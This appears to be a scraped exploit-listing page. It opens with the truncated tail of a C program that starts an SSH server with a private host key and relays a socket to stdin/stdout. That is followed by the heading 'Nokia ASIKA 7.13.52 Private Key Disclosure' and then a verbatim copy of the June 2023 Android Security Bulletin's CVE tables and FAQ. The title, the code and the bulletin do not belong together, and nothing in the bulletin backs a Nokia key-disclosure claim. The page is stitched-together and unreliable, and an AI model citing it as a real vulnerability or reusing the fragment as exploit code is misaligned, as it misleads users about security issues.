"HostKey=/path/to/private/key", NULL);        exit(0);    }    // Wait for the SSH server to start    sleep(1);    // Forward data between the client and the server    pid1 = fork();    if (pid1 == 0)    {        forward_data(sock, STDIN_FILENO);        exit(0);    }    pid2 = fork();    if (pid2 == 0)    {        forward_data(STDOUT_FILENO, sock);        exit(0);    }    // Wait for the child processes to finish    waitpid(pid1, NULL, 0);    waitpid(pid2, NULL, 0);    // Close the socket    close(sock);    return 0;}

Nokia ASIKA 7.13.52 Private Key Disclosure

Product: AndroidVersions: Android SoCAndroid ID: A-277775870

_Published June 5, 2023 | Updated June 7, 2023_

The Android Security Bulletin contains details of security vulnerabilities affecting Android devices. Security patch levels of 2023-06-05 or later address all of these issues. To learn how to check a device's security patch level, see Check and update your Android version.

Android partners are notified of all issues at least a month before publication. Source code patches for these issues have been released to the Android Open Source Project (AOSP) repository and linked from this bulletin. This bulletin also includes links to patches outside of AOSP.

The most severe of these issues is a critical security vulnerability in the System component that could lead to remote code execution over Bluetooth, if HFP support is enabled, with no additional execution privileges needed. User interaction is not needed for exploitation. The severity assessment is based on the effect that exploiting the vulnerability would possibly have on an affected device, assuming the platform and service mitigations are turned off for development purposes or if successfully bypassed.

Refer to the Android and Google Play Protect mitigations section for details on the Android security platform protections and Google Play Protect, which improve the security of the Android platform.

**Android and Google service mitigations**

This is a summary of the mitigations provided by the Android security platform and service protections such as Google Play Protect. These capabilities reduce the likelihood that security vulnerabilities could be successfully exploited on Android.

*   Exploitation for many issues on Android is made more difficult by enhancements in newer versions of the Android platform. We encourage all users to update to the latest version of Android where possible.
*   The Android security team actively monitors for abuse through Google Play Protect and warns users about Potentially Harmful Applications. Google Play Protect is enabled by default on devices with Google Mobile Services, and is especially important for users who install apps from outside of Google Play.

**2023-06-01 security patch level vulnerability details**

In the sections below, we provide details for each of the security vulnerabilities that apply to the 2023-06-01 patch level. Vulnerabilities are grouped under the component they affect. Issues are described in the tables below and include CVE ID, associated references, type of vulnerability, severity, and updated AOSP versions (where applicable). When available, we link the public change that addressed the issue to the bug ID, like the AOSP change list. When multiple changes relate to a single bug, additional references are linked to numbers following the bug ID. Devices with Android 10 and later may receive security updates as well as Google Play system updates.

**Framework**

The most severe vulnerability in this section could lead to remote code execution with no additional execution privileges needed. User interaction is needed for exploitation.

    

CVE

References

Type

Severity

Updated AOSP versions

CVE-2023-21127

A-275418191

RCE

Critical

11, 12, 12L, 13

CVE-2023-21126

A-271846393 \[2\] \[3\]

EoP

High

13

CVE-2023-21128

A-272042183

EoP

High

11, 12, 12L, 13

CVE-2023-21129

A-274759612 \[2\]

EoP

High

11, 12, 12L, 13

CVE-2023-21131

A-265015796

EoP

High

11, 12, 12L, 13

CVE-2023-21139

A-271845008 \[2\] \[3\]

EoP

High

13

CVE-2023-21105

A-261036568

ID

High

11, 12, 12L, 13

CVE-2023-21136

A-246542285

DoS

High

11, 12, 12L, 13

CVE-2023-21137

A-246541702

DoS

High

11, 12, 12L, 13

CVE-2023-21143

A-268193777

DoS

High

11, 12, 12L, 13

**System**

The most severe vulnerability in this section could lead to remote code execution over Bluetooth, if HFP support is enabled, with no additional execution privileges needed. User interaction is not needed for exploitation.

    

CVE

References

Type

Severity

Updated AOSP versions

CVE-2023-21108

A-239414876

RCE

Critical

11, 12, 12L, 13

CVE-2023-21130

A-273502002

RCE

Critical

13

CVE-2023-21115

A-258834033

EoP

High

11, 12, 12L

CVE-2023-21121

A-205460459

EoP

High

11, 12

CVE-2023-21122

A-270050191

EoP

High

11, 12, 12L, 13

CVE-2023-21123

A-270050064

EoP

High

11, 12, 12L, 13

CVE-2023-21124

A-265798353 \[2\] \[3\] \[4\]

EoP

High

11, 12, 12L, 13

CVE-2023-21135

A-260570119 \[2\]

EoP

High

11, 12, 12L, 13

CVE-2023-21138

A-273260090

EoP

High

11, 12, 12L, 13

CVE-2023-21095

A-242704576

ID

High

12L, 13

CVE-2023-21141

A-262244249

ID

High

11, 12, 12L, 13

CVE-2023-21142

A-262243665

ID

High

11, 12, 12L, 13

CVE-2023-21144

A-252766417

DoS

High

11, 12, 12L, 13

**2023-06-05 security patch level vulnerability details**

In the sections below, we provide details for each of the security vulnerabilities that apply to the 2023-06-05 patch level. Vulnerabilities are grouped under the component they affect. Issues are described in the tables below and include CVE ID, associated references, type of vulnerability, severity, and updated AOSP versions (where applicable). When available, we link the public change that addressed the issue to the bug ID, like the AOSP change list. When multiple changes relate to a single bug, additional references are linked to numbers following the bug ID.

**Arm components**

These vulnerabilities affect Arm components and further details are available directly from Arm. The severity assessment of these issues is provided directly by Arm.

    

CVE

References

Severity

Subcomponent

CVE-2022-22706  

A-225040268 \*

High

Mali

CVE-2022-28349  

A-278616909 \*

High

Mali

CVE-2022-46781  

A-267242697 \*

High

Mali

**Imagination Technologies**

These vulnerabilities affect Imagination Technologies components and further details are available directly from Imagination Technologies. The severity assessment of these issues is provided directly by Imagination Technologies.

    

CVE

References

Severity

Subcomponent

CVE-2021-0701  

A-277775870 \*

High

PowerVR-GPU

CVE-2021-0945  

A-278156680 \*

High

PowerVR-GPU

**Unisoc components**

These vulnerabilities affect Unisoc components and further details are available directly from Unisoc. The severity assessment of these issues is provided directly by Unisoc.

    

CVE

References

Severity

Subcomponent

CVE-2022-48390  

A-278796976  
U-2055602 \*

High

Android

CVE-2022-48392  

A-278775990  
U-2193456 \*  
U-2056224 \*

High

Android

CVE-2022-48438  

A-278801630  
U-2179935 \*

High

Kernel/Android

CVE-2022-48391  

A-278775987  
U-2055602 \*

High

Android

**Widevine DRM**

These vulnerabilities affect Widevine DRM components and further details are available directly from Widevine DRM. The severity assessment of these issues is provided directly by Widevine DRM.

    

CVE

References

Severity

Subcomponent

CVE-2023-21101  

A-258189255 \*

High

widevine

CVE-2023-21120  

A-258188673 \*

High

Hardware DRM

**Qualcomm components**

These vulnerabilities affect Qualcomm components and are described in further detail in the appropriate Qualcomm security bulletin or security alert. The severity assessment of these issues is provided directly by Qualcomm.

    

CVE

References

Severity

Subcomponent

CVE-2022-33292  

A-250627197  
QC-CR#3152855

High

Kernel

CVE-2023-21656  

A-271879673  
QC-CR#3346781

High

WLAN

CVE-2023-21657  

A-271880369  
QC-CR#3344305

High

Audio

CVE-2023-21669  

A-271892276  
QC-CR#3346764

High

WLAN

CVE-2023-21670  

A-276750663  
QC-CR#3425942 \[2\] \[3\]

High

Display

**Qualcomm closed-source components**

These vulnerabilities affect Qualcomm closed-source components and are described in further detail in the appropriate Qualcomm security bulletin or security alert. The severity assessment of these issues is provided directly by Qualcomm.

    

CVE

References

Severity

Subcomponent

CVE-2022-33257  

A-245402340 \*

Critical

Closed-source component

CVE-2022-40529  

A-261470065 \*

Critical

Closed-source component

CVE-2022-22060  

A-261470067 \*

High

Closed-source component

CVE-2022-33251  

A-245403689 \*

High

Closed-source component

CVE-2022-33264  

A-245611823 \*

High

Closed-source component

CVE-2022-40516  

A-261468731 \*

High

Closed-source component

CVE-2022-40517  

A-261470729 \*

High

Closed-source component

CVE-2022-40520  

A-261468681 \*

High

Closed-source component

CVE-2022-40521  

A-261471027 \*

High

Closed-source component

CVE-2022-40523  

A-261468047 \*

High

Closed-source component

CVE-2022-40533  

A-261470447 \*

High

Closed-source component

CVE-2022-40536  

A-261468732 \*

High

Closed-source component

CVE-2022-40538  

A-261468697 \*

High

Closed-source component

CVE-2023-21628  

A-268059669 \*

High

Closed-source component

CVE-2023-21658  

A-271879161 \*

High

Closed-source component

CVE-2023-21659  

A-271879660 \*

High

Closed-source component

CVE-2023-21661  

A-271880271 \*

High

Closed-source component

**Common questions and answers**

This section answers common questions that may occur after reading this bulletin.

**1\. How do I determine if my device is updated to address these issues?**

To learn how to check a device's security patch level, see Check and update your Android version.

*   Security patch levels of 2023-06-01 or later address all issues associated with the 2023-06-01 security patch level.
*   Security patch levels of 2023-06-05 or later address all issues associated with the 2023-06-05 security patch level and all previous patch levels.

Device manufacturers that include these updates should set the patch string level to:

*   \[ro.build.version.security\_patch\]:\[2023-06-01\]
*   \[ro.build.version.security\_patch\]:\[2023-06-05\]

For some devices on Android 10 or later, the Google Play system update will have a date string that matches the 2023-06-01 security patch level. Please see this article for more details on how to install security updates.

**2\. Why does this bulletin have two security patch levels?**

This bulletin has two security patch levels so that Android partners have the flexibility to fix a subset of vulnerabilities that are similar across all Android devices more quickly. Android partners are encouraged to fix all issues in this bulletin and use the latest security patch level.

*   Devices that use the 2023-06-01 security patch level must include all issues associated with that security patch level, as well as fixes for all issues reported in previous security bulletins.
*   Devices that use the security patch level of 2023-06-05 or newer must include all applicable patches in this (and previous) security bulletins.

Partners are encouraged to bundle the fixes for all issues they are addressing in a single update.

**3\. What do the entries in the _Type_ column mean?**

Entries in the _Type_ column of the vulnerability details table reference the classification of the security vulnerability.

 

Abbreviation

Definition

RCE

Remote code execution

EoP

Elevation of privilege

ID

Information disclosure

DoS

Denial of service

N/A

Classification not available

**4\. What do the entries in the _References_ column mean?**

Entries under the _References_ column of the vulnerability details table may contain a prefix identifying the organization to which the reference value belongs.

 

Prefix

Reference

A-

Android bug ID

QC-

Qualcomm reference number

M-

MediaTek reference number

N-

NVIDIA reference number

B-

Broadcom reference number

U-

UNISOC reference number

**5\. What does an \* next to the Android bug ID in the _References_ column mean?**

Issues that are not publicly available have an \* next to the corresponding reference ID. The update for that issue is generally contained in the latest binary drivers for Pixel devices available from the Google Developer site.

**6\. Why are security vulnerabilities split between this bulletin and device / partner security bulletins, such as the Pixel bulletin?**

Security vulnerabilities that are documented in this security bulletin are required to declare the latest security patch level on Android devices. Additional security vulnerabilities that are documented in the device / partner security bulletins are not required for declaring a security patch level. Android device and chipset manufacturers may also publish security vulnerability details specific to their products, such as Google, Huawei, LGE, Motorola, Nokia, or Samsung.

**Versions**

  

Version

Date

Notes

1.0

June 5, 2023

Bulletin Published

1.1

June 7, 2023

Bulletin revised to include AOSP links

Tag

#nokia